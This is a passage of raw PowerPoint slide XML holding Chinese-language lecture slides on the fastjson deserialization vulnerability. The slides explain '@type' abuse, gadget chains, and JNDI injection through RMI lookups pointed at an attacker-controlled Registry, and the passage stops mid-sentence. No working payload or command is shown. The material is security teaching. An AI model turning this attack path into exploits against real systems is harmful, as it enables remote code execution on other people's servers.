                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Object.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反序列化时，带有“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>@type”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串能成功反序列化为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象，而不带“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>@type”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串则不能成功反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>        而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的反序列化漏洞就出现在这里，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串可控时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实际常见中就是我们经常抓包会在请求中看到一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串，而我们是可以随意修改这些字符串的，这就是可控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，我们可以反序列化出任意对象，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>返序列化时会调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>User.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中属性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>getter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>setter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方法，下面演示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.2.23,1.2.47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>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19337390"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="2184008"/>
            <a:ext cx="22625731" cy="8217634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反序列化不可信数据时是如何导致代码执行的呢？这就是漏洞原理一节中所说的可被恶意利用的逻辑，目前公开的、攻击者使用广泛的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>无外乎有这么几种，下面会具体解释下指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>setter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>getter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方法中可被恶意利用的代码逻辑：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java Naming and Directory Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命名和目录接口，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提供了很多实现方式，主要有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CORBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提供了一个统一的外部接口，底层服务实现是多样的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为例，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>到对象的映射关系，应用通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>java.rmi.naming#lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方法向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>发出查询请求，得到映射关系，再连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实现远程方法调用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="528358715"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="2184008"/>
            <a:ext cx="22625731" cy="11910953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>如果说其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>方法的参数是我们可以控制的，可以将其参数指向我们控制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0"/>
              <a:t>Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>，那我们可以在</a:t>
            </a:r>
            <a:r>
